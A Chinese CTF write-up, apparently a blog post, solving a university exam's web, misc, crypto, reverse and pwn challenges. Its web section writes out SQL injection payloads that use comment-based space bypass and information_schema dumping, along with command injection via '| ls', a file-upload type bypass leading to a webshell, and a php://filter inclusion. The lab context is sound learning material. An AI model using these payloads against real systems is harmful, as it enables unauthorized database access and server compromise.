开学考试复现

目录

 

web

easy_sql

easy_php

easy_rce

easy_include

easy_upload

Boom!

传个参吧

flag在哪?

 

misc

music

今天你学习了吗?

想看我驴哥吗? 

流量分析

徐江的嘲讽

Life Story

Crypto

怎么?只会贝斯拿不下你?

简单的密码

easy_rsa

5+n的凯撒

Reverse

re1

Pwn

NC


 

web

easy_sql

这题没做出来,发现是绕过空格(可用/**/绕过),但是在使用联合查询语句时查不出来

后面师兄说了子查询才明白怎么做,学到了新知识

第一步:首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数,尝试后发现有三列 

输入-1'/**/order/**/by/**/3#
7800ff66412e4c32a495821417f8a04d.png

 第二步:爆出显示位,就是看看表格里面那一列是在页面显示的。可以看到是第1列里面的数据是显示在页面的。

输入-1'/**/union/**/select/**/1,2,3#

1ec6e22ff57e44a38b79bc371f57b000.png

第三步:获取当前数据名,得到库yunxi_exam
输入-1'/**/union/**/select/**/database(),2,3#
 d207505ef0384adab9cfb72fc3298964.png

 第四步: 爆表          得到表bighacker,users

使用到子查询

输入  -1'/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='yunxi_exam'),2,3#
0eed853c3aa34816942936785fcb23e1.png

 第五步:爆字段名        得到字段hack1,hack2,hack3

输入   -1'/**/union/**/select/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='bighacker'),2,3#

593ad96e1fe04faa93545c35f30ba7c2.png

 第六步:获得flag

输入   -1'/**/union/**/select/**/group_concat(concat_ws("~",hack2,hack3)),2,3/**/from/**/bighacker#

c854c83b681e4badb492e2c50fecee4f.png

 

 

easy_php

分析代码可知是get方式传入0、1,且0、1的md5值要相等,a的值还要等于2023
74a9b80ffadc4d388a947bb89cbcb9d8.png

 这里考虑到md5碰撞绕过即可 ?0[]=2023&1[]=2

1f92224111784927a99c499cc88cad28.png

 

 

easy_rce

发现提示输入ip,猜测是命令执行使用| ls查看
69efd6e331ae4ca98acacb3e931ea60f.png

 继续看根目录,发现flag文件

8806011bdc0a433d86d932d30bc30b32.png

cat被过滤了,tac即可
10f1bee9fe1446b9b4b99992261c3b51.png

 

 

easy_include

提示很明显了,php://filter协议即可

bdbafbb6d2584f66aa43234bf0d5d022.png
 

 

 

easy_upload

上传php文件,改检查类型为image/jpeg
b5e2c75a945e4a06b9823eb0af13635e.png

 蚁剑连接即可

b124a7df3b0d48d4b1f610b24d689bd1.png

 

 

Boom!

一开始遍历10w字典失败,最后看了提示,发现密码是学号是2021228041..

差两位,BP爆破即可

5f669054c96f43098d6fa45f567f11da.png
 

 

 

传个参吧

提示传参,查看源代码,发现应该传的参数是hint
623b3255b226495a97af5c0f841cface.png

 进入页面,分析POST方式传入Exam=Welcom_come_to_Yunxi_Exam即可

9cf4ecf0671949a7abb2c158a20242a2.png

49aa24a3ec9c4a4581c43097f0f19639.png

 

 

flag在哪?

查看网页源代码即可

2c83f85821a341cc8c2e4ef19d014655.png
 

 

 

misc

music

提示密码nono,mp3隐写解密即可
decode.exe -X music.mp3 -P nono
查看它的txt文件即可
aca8c299cad446af81c9c204cbdcd4be.png
 

 

今天你学习了吗?

题目提示下面那条白边不够明显吗,猜测是图片改高即可

cdf3533825924216aedd06bc5264c880.png

 010尝试发现flag

50162a5a09c14b8ba21ebe7c50b4d8aa.png

 

 

想看我驴哥吗? 

发现图片压缩需要密码,010看一看不存在伪加密,尝试暴力破解,发现密码是604604
4e84aa0c82e34e7295c6b0595fbeff24.png

 e730d00b8aa94d50a642cbe203dfe018.png

 解压后在图片详细信息下发现一段base64,解码即可

9834f8d104b943c28570644e7b42958f.png

 

 

 

流量分析

发现是一个流量包,在里面搜索即可找到flag
071438c062654507b53bed7214221fde.png
 

 

徐江的嘲讽

发现又是一个要密码的压缩包,010看一看,发现伪加密,改出即可
068f21b1944a424eb24bed167f24924a.png

e3693319cc5f4d77b7fdbfe4124f1061.png

 

 

Life Story

一个损坏的压缩包,010看看发现不是压缩包,记事本看看,发现一串emo表情
c462f093681c41f4adae0657a1209285.png

 emo解密即可,再来一次base32、base64

696798209c184602b6b2d69a9f292178.png

9f9f7eb78d85410aaa93528239d6acff.png

 

 

 

 

 

 

Crypto

怎么?只会贝斯拿不下你?


 base家族遍历即可

dac58a2d46cc44c29591d04ca1fad46a.png

71b609612e7c4f0ba8a35627f8246827.png

 

 

简单的密码

核心价值观密码解密
73c275d59bdb4ed297528d8cf6f5f1e4.png
 

 再来一个百家姓解密即可

83bd9b863b9e47cb871fe7dd423683cf.png

 

 

 

easy_rsa

很简单的一个rsa解密
5d578efa673a4ccc8fc7223fc1972a18.png
 

 用个工具或者脚本即可,使用工具时,e的值需要10进制转为16进制,给出的D值即为flag

e938efac44c94ad7af6fc482f66b6486.png

 

 

5+n的凯撒

简单的变异凯撒,找规律发现偏移量应该是5+n
8d15387b44964a8eb08e8e0d32f07705.png
 

 搞个py脚本跑一跑即可

9f02251bbb0d49eea73aabc9e1819a3a.png

 

 

 

 

Reverse

re1

查壳后ida32位打开即可
974e109c3c9343f8a7e37ea30b829820.png
 

 

 

Pwn

NC

kali打开自带nc连接即可

f04dcbd5906d49a7abde989c51910b03.png

 

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值